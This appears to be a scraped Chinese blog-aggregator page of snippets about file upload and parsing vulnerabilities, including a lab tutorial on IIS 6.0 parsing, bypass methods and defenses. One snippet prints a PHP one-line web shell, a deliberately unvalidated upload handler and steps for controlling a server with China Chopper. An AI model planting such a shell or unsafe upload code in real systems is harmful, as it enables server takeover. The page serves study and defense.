精华内容
下载资源
问答
  • 上传漏洞

    2018-11-23 21:29:50
    上传漏洞概述: 在网站的运营过程中,不可避免的对网站的某些页面或者内容进行更新,这时便需要使用网站的文件上传功能。如果不对被上传的文件进行限制或者限制被绕过,该功能便有可能被利用于上传可执行文件.脚本到...

    上传漏洞概述:
    在网站的运营过程中,不可避免的对网站的某些页面或者内容进行更新,这时便需要使用网站的文件上传功能。如果不对被上传的文件进行限制或者限制被绕过,该功能便有可能被利用于上传可执行文件.脚本到服务器上,进而进一步导致服务器沦陷。
    常见的漏洞分类:
    服务器配置不当导致文件上传
    开源编辑器存在上传漏洞
    本地文件上传限制可以被绕过
    服务端过滤不严可以被绕过
    解析漏洞导致的文件执行
    文件路径截断
    ...............
    上传漏洞的利用成果:
    较为快速.直接的获取网站的web权限
    配合其他漏洞达到同样获取网站权限的目的
    为后续进一步渗透提供较方便的跳板
    IIS写程序漏洞:
    一般都是http请求put方法,当然web服务器默认是不开启put等方法,出现该漏洞的主要原因是管理员对服务器错误的配置,常见的主要就是管理员错误的打开了IIS的服务器的webdav而且没有开启权限验证,导致可以put文件到服务器再利用服务器的解析漏洞运行恶意代码或用webdav的move方法将所上传的带有恶意代码的普通文件后缀修改为可执行文件后缀,运行恶意代码。(网上已经有利用的工具)
    解析漏洞:
    是指web服务因对http请求处理不当导致,将不允许可执行的脚本,文件等当做可执行脚本,文件等执行。
    解析漏洞分析:
    IIS 5.X/6.0解析漏洞
    IIS 7.0/IIS 7.5/Nginx <0.8.3畸形解析漏洞
    Nginx < 8.03空字节代码执行漏洞
    Apache解析漏洞
    CVE-2.13-4547 Nginx 解析漏洞

    件上传漏洞-客户端限制被绕过:

    绕过验证方法:

                            禁用js

                            本地上传表单

                            burpsuite代理拦截上传

                            删除或添加js代码

     

     

    展开全文
  • ctf-web:文件上传漏洞和文件解析漏洞

    万次阅读 多人点赞 2020-10-11 21:13:56
    这次的内容是关于文件上传的漏洞和文件解析的漏洞的内容,在下面我会进行一...文件上传漏洞 这个漏洞产生的原因是因为上传文件的不严谨所产生的.比如我恶意上传了一个一句话木马,但是服务器没有进行对文件的过滤,就会将.

    这次的内容是关于文件上传的漏洞和文件解析的漏洞的内容,在下面我会进行一个关于这两个方面的内容的实际操作以及原理介绍.
    其实我一直想学的就是web渗透,但是一直都不知道web渗透都有什么后来才知道居然就是sql注入,还有这几个漏洞的利用就是web渗透…这不就是我好几年前看的东西么…
    当然,其实我也学的不是很精通,只是稍微会一点,就不夸夸其谈了.
    先说说这两个漏洞的区别.
    一.文件上传漏洞
    这个漏洞产生的原因是因为上传文件的不严谨所产生的.
    比如我恶意上传了一个一句话木马,但是服务器没有进行对文件的过滤,就会将上传的文件存放在服务器,这样是十分危险的.并且一般和后面的文件解析漏洞配合在一起使用.
    二.文件解析漏洞
    这个漏洞是由于服务器的原因造成的,就比如我们一会儿要举例的iis6.0服务器就有这个漏洞.
    简单来说,在iis6.0服务器上,如果服务器有一个"xxx.asp"文件夹,那么就会将这个文件下面的所有文件都当成一个asp脚本去执行.

    想想看,如果我们上传了一个删除系统数据库的病毒文件上去,然后又被解析成了某种语法去执行,是不是后果很可怕?
    因此,我会特地去讲一下这个东西的如何去实现的.后面我会把网站的源码附上.很多服务器都存在这个漏洞,我这里就介绍iis6.0的文件解析漏洞,想看其他的服务器的漏洞可以去百度一下.
    工具的话我把名字发上来,自己去找一下.
    实验环境:虚拟机win2003一台,软件phpstudy,中国菜刀

    一.iis6.0服务器的文件解析漏洞

    前面已经说过,iis6.0的漏洞就是会把xxx.asp文件夹下的文件都当作asp文件执行,我们试试便知.
    win2003都会自带iis6,因此直接安装就好,安装教程我就不发了,百度有.
    如图,此刻已经是安装好的.记得点到web的选项,按照图中进行配置.
    在这里插入图片描述
    此刻我们已经搭建网站成功.用主机输入服务器ip即可进行访问.由于我之前搭建phpstudy占用了80端口,我就把端口改成了82.你们在做的时候应该是不需要这一步的.
    在这里插入图片描述
    配置好以后,点击网站,然后右键那个默认网站,点击停用.
    在这里插入图片描述
    之后右键网站->新建->网站,新建一个自己的网站.我的已经建好了,就不做多余的演示了
    在这里插入图片描述

    需要注意的是,在新建网站的时候,有个运行脚本的选项要选上.如图
    在这里插入图片描述

    在这个里面点击右键,添加一个文件,和文件夹,文件名字叫做"index.html",文件夹名字随便起一个以.asp结尾的即可,我的是wzc.asp.然后在文件夹里面新建一个文件,名字随便起一个,比如1.txt.
    在这里插入图片描述
    在这里插入图片描述
    然后在这两个新建的1.txt和index.html都写入以下的内容:

    <%
    response.write("My first ASP script!")
    %>
    

    为什么要这么建文件呢?其实就是为了验证这个漏洞的.上面的代码是asp的语法,在屏幕上显示一句话.
    如果文件被解析成了asp文件,那么就会只显示引号里面的内容.
    如果没有的话,就直接把所有内容都显示出来.
    因此.我们新建了这两个文件用来验证.

    验证一:访问非asp文件夹下的文件(我的端口是81)

    也就是网站的主页.我用主机进行访问时,页面显示的是这样的:
    在这里插入图片描述
    看,是不是直接把文件当成了一个txt文本显示了出来?

    验证二:访问以.asp结尾文件夹下的文件

    访问结果如图:
    在这里插入图片描述
    果然,我们的代码被当成了asp脚本执行了.由此验证,我们的iis6.0确实存在这个漏洞.

    二.文件上传漏洞和文件解析漏洞的结合使用

    文件上传漏洞产生的原因就不像上一个是因为服务器产生的了,而是因为程序员的不严谨而产生的.
    在一些允许上传文件的网站中,编写php后台脚本时,不会对文件近进行检查,所以有一些黑客会利用这个上传一个叫"一句话木马"的脚本.
    这种脚本属于木马,当上传成功以后,在攻击者的电脑使用比如"中国菜刀"之类的软件进行连接,最终为所欲为.
    当然,中国菜刀属于比较落后的软甲,比较先进的有冰蝎等软件.有兴趣可以百度.
    由此可见,这种漏洞的危害性是非常大的.下面我会演示一下这个过程.

    过程实现

    首先安装phpstudy,然后在你的服务器下添加下面两个网站.源码发在下面.
    文件一:upload-file.html

    <html>
    <head>
     <title> 文件上传之解析漏洞~php</title>
     </head>
    <body>
    
    <form action="upload.php" method="post"
    enctype="multipart/form-data">
    <label for="file">Filename:</label>
    <input type="file" name="file" id="file" /> 
    <br />
    <input type="submit" name="submit" value="提交" />
    </form>
    
    </body>
    </html>
    

    文件二:upload.php

    <?php
    
      if ($_FILES["file"]["error"] > 0)
        {
        echo "Return Code: " . $_FILES["file"]["error"] . "<br />";
        }
      else
        {
        echo "Upload: " . $_FILES["file"]["name"] . "<br />";
        echo "Type: " . $_FILES["file"]["type"] . "<br />";
        echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
        echo "Temp file: " . $_FILES["file"]["tmp_name"] . "<br />";
    
        if (file_exists("upload/" . $_FILES["file"]["name"]))
          {
          echo $_FILES["file"]["name"] . " already exists. ";
          }
        else
          {
          move_uploaded_file($_FILES["file"]["tmp_name"],
          "upload/" . $_FILES["file"]["name"]);
          echo "Stored in: " . "upload/" . $_FILES["file"]["name"];
          }
        }
     
    ?>
    

    放在如图的位置.
    在这里插入图片描述
    远程访问以下,发现成功.
    在这里插入图片描述
    我们随便上传一个php文件.
    在这里插入图片描述
    …连点防御都没有(从那个php代码就可以看出,不过我是从攻击者的角度出发的,由此可证明这个php代码有文件上传的漏洞).
    如图,在服务器下有个upload文件,里面就是我们上传的文件.
    在这里插入图片描述
    这个php一句话木马只是用来测试的,是为了看看能不能上传成功.现在我把一句话木马源码奉上.

    <?php eval($_POST["wzc"]);?>
    

    这段代码的原理我就不解释了.目的是为了方便使中国菜刀进行连接.你需要修改的使引号里面的内容,这个是后面中国菜刀连接是的密码.
    如图,这个是我的中国菜刀的界面,按照图中的方式配置.
    在这里插入图片描述
    上面把你的一句话木马的网站上的路径填上.我当时为了方便,把名字改成了"1.php".后面的空填刚刚的密码,下面记得选择php(eval)代码类型.连接以后,右键文件管理,会产生如图的效果.
    在这里插入图片描述
    看,现在我们就进到服务器里面了,接下来想怎么搞就怎么搞了.

    好了,就写这么多吧.
    剩余的也懒的想了,如果还想继续看一些东西的话,可以关注我,我后续会发一些比如数据库注入,软件破解之类的东西.
    有兴趣的可以加我qq:1392969921

    展开全文
  • 当文件上传点没有对上传的文件进行严格的验证和过滤时,就容易造成任意文件上传,包括上传动态文件(asp,php,jsp)...如果上传的目标目录没有限制执行权限,导致所上传的动态文件可以正常执行,就导致了文件上传漏洞

    关于文件上传漏洞

    写在文章之前-避免大家踩坑


    关于文件上传漏洞相关篇章用到的 upload-lads 靶场为Docker - 20关类型的,目前最新的版本为21关。且文中某些绕过方法仅适用于低于 PHP 5.2.4 以下的版本,Docker安装的环境为 5.2.17 版本,建议大家如果想通关的话,可以在WIN环境利用 PHP study 搭建 绿色版 upload-lads 可以通过降低 PHP 版本,进行一些关卡的绕过!


    什么是文件上传漏洞?

    当文件上传点没有对上传的文件进行严格的验证和过滤时,就容易造成任意文件上传,包括上传动态文件(asp,php,jsp)等
    如果上传的目标目录没有限制执行权限,导致所上传的动态文件可以正常执行,就导致了文件上传漏洞。

    场景:顾名思义就是上传文件的地方。

    WEB
    
    APP
    
    软件
    
    任何涉及到上传的操作
    
    注意:有些上传的走的协议不一样,如走网站协议的上传点就可以利用
    	 上传操作测试上传漏洞;像WEB、APP甚至有些软件的上传功能点走的就是网站协议就可以利用,
    	 但是有的上传点走的是类似字节流协议的情况,这样基本上就不用测试了。
    

    原理:利用文件上传功能,上传带有后门的文件[图片、文本、文件、脚本等]以达到控制网站的目的。

    存在上传漏洞的必要条件

    (1)存在上传点
    (2)可以上传动态文件
    (3)上传目录有执行权限,并且上传的文件可执行
    (4)可访问到上传的动态文件或脚本
    

    文件上传漏洞高危触发点

    相册
    头像上传
    视频
    照片分享
    附件上传(论坛发帖、邮箱)
    文件管理器
    
    存在文件上传功能的地方都有可能存在文件上传漏洞,比如相册、头像上传,视频、照片分享。
    论坛发帖和邮箱等可以上传附件的地方也是上传漏洞的高危地带。
    另外像文件管理器这样的功能也有可能被攻击者所利用。
    
    值得注意的是,如果移动端也存在类似的操作的话,那么相同的原理,也存在文件上传漏洞的风险。
    

    通过简单的代码案例去理解文件上传

    思考:文件上传会接收哪些信息?从安全的角度思考接收的这些信息该如何过滤何利用?

    以下是一个简单的文件上传功能

    <html>
    <head>
    <meta charset="utf-8">
    <title>UP_TEST</title>
    </head>
    <body>
    
    <form action="" method="post" enctype="multipart/form-data">
        <label for="file">文件名:</label>
        <input type="file" name="file" id="file"><br>
        <input type="submit" name="submit" value="提交">
    </form>
    
    </body>
    </html>
    
    
    <?php
    $name=$_FILES["file"]["name"];
    echo "上传文件名: " . $name . "<br>";
    
    $type=$_FILES["file"]["type"];
    echo "文件类型: " . $type . "<br>";
    
    $size=$_FILES["file"]["size"];
    echo "文件大小: " . $size . " kB<br>";
    //echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
    
    $up_error_info=$_FILES["file"]["error"];
    echo "错误:: " . $up_error_info . "<br>";
    
    $temp_name=$_FILES["file"]["tmp_name"];
    echo "文件临时存储的位置: " . $temp_name . "<br>";
    
    ?>
    

    从代码中我们可以看到"$_FILE"包含有大小,名字,类型,临时名,错误信息。

    现在我们看一个真实上传操作的数据包


    在这里插入图片描述


    现在我们思考一下,存在安全问题可以实现文件上传突破的时候哪些地方是我们可以利用的?或者说哪些地方是可以验证出是非法类型攻击的?

    数据包
    
    Content-Type: image/jpeg		# 此处验证文件类型[如PHP的文件类型 "application/octet-stream"]
    
    文件头信息:JPG/PNG/GIF/zip...
    
    文件名后缀类型:jpg/png/gif/zip...
    

    通过上面代码的演示我们分析到常规性的代码,过滤的上传内容点是很多的。一个比较安全的文件上传的要验证是验证多方面的,单纯的验证一反面可能会被伪造去突破,当把所有验证的点都验证一遍,那么说明这样的上传点是安全的,一般没有安全漏洞。

    我们所要了解的文件上传漏洞其实就是去测试文件上传功能点验证了哪些东西?哪些点我们修改之后可以绕过验证,从而让我们钻了空子进行了突破。

    文件上传大部分都会在数据包上做文章,用Burp工具就是把数据包拦截下来在数据包上进行测试。[抓包工具有很多种,都可以实现拦截,但Burp相对来说更简单方便快捷一些。]

    后门必须要和网站语言的格式相关

    展开全文
  • 文件上传漏洞

    万次阅读 多人点赞 2018-09-29 20:05:03
    文件上传漏洞 文件上传的过滤 上传文件过滤的绕过 上传html文件 文件上传的防御 upload-libs 文件上传漏洞 文件上传漏洞是指攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,...
    展开全文
  • Shell上传漏洞php

    2014-01-14 23:45:43
    Shell上传漏洞
  • 1.文件上传漏洞原理 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。常见场景是web服务器允许用户上传图片或者普通文本文件保存,而用户绕过上传机制上传恶意...
  • php 判断上传类型 避免上传漏洞
  • 文件上传漏洞简述

    2019-04-20 22:34:18
    文件上传漏洞是常见的几大漏洞之一,也是非常重要的一种。下面对文件上传漏洞的概念、框架以及应用危害等进行简述,在学习一种漏洞之前要先深入理解它。 首先,什么是文件上传漏洞,顾名思义,这个漏洞的产生是...
  • weblogic上传漏洞打补丁.zipweblogic上传漏洞打补丁.zipweblogic上传漏洞打补丁.zipweblogic上传漏洞打补丁.zip
  • 上传漏洞”入侵是目前对网站最广泛的入侵方法。90%的具有上传页面的网站,都存在上传漏洞。本文将介绍常见的网站上传漏洞及其防范技巧。   一、能直接上传asp文件的漏洞   如果网站有上传页面,就要警惕直接...
  • 上传漏洞浅见

    千次阅读 2016-07-21 10:36:41
    上传漏洞0xx1 上传漏洞简介如何确定web应用程序是否存在上传漏洞呢?比如,有些网站,用户可以上传自己的个性头像,即图片文件,但是文件上传时并没有做验证,导致用户可以上传任意文件,这就是上传漏洞 0xx2 解析...
  • 文件上传漏洞原理/方式/防护

    万次阅读 2021-07-03 23:34:28
    文件上传漏洞是获取服务器权限最快也是最直接的一个漏洞 文件上传漏洞原理 文件上传漏洞是指用户上传可执行脚本文件 , 并通过脚本文件控制Web服务器 其本质是服务器执行了用户上传的文件 文件上传漏洞方式 ...
  • 上传任意文件或者上传漏洞

    千次阅读 2019-06-02 07:35:40
    2.上传漏洞 问题描述:没有对上传文件扩展名进行限制或者限制可以被绕过。 整改方案: 1.校验文件格式 2.通过文件头校验文件格式 3.文件大小校验 4.文件重命名 1.校验文件格式(配置上传白名单) 1....
  • 后缀验证:可以通过解析漏洞通过验证 文件内容验证:将一个图片文件改为php格式,然后再里面最后的内容里面填写php代码,然后以php的格式上传,系统会认为这是一个jpg格式的文件,达到... 开源编辑器的上传漏洞 ...
  • php文件上传漏洞

    千次阅读 2019-03-06 12:28:59
    文件上传漏洞 文件上传漏洞是指由于服务器对于用户上传部分的控制不严格导致攻击者可以上传一个恶意的可执行的文件到服务器。简单点说,就是用户直接或者通过各种绕过方式将webshell上传到服务器中进而执行利用。 ...
  • 50. 文件上传篇——文件上传漏洞原理.pdf
  • 任意上传漏洞演示

    2018-03-07 13:40:47
    讲述了任意上传漏洞以及一句话木马:("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
  • 文件上传漏洞 —— 内部文件上传系统漏洞分析溯源 这篇主要复现墨者学院的一个内部文件上传漏洞,内部文件上传系统漏洞分析溯源,还有另一题会写到另一篇里面。 关于文件上传漏洞,前面我的博客里面有写原理以及...
  • Webshell文件上传漏洞

    千次阅读 2019-11-13 22:48:17
    文件上传漏洞是由于网站对上传的文件没有进行严格筛查,导致用户可以上传一些可执行文件的恶意代码,或webshell,如asp,hph等,然后再通过url访问执行恶意代码,或是通过webshell,达到对网站的控制。 本次在一个...
  • 文件上传漏洞研究与实践 法律风险
  • 文件上传漏洞攻击与防范方法

    万次阅读 多人点赞 2019-08-30 17:04:20
    文件上传漏洞攻击与防范方法 文件上传漏洞简介: 文件上传漏洞是web安全中经常用到的一种漏洞形式。是对数据与代码分离原则的一种攻击。上传漏洞顾名思义,就是攻击者上传了一个可执行文件如木马,病毒,恶意脚本,...
  • PHP漏洞全解—————9、文件上传漏洞.pdf

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 60,505
精华内容 24,202
关键字:

上传漏洞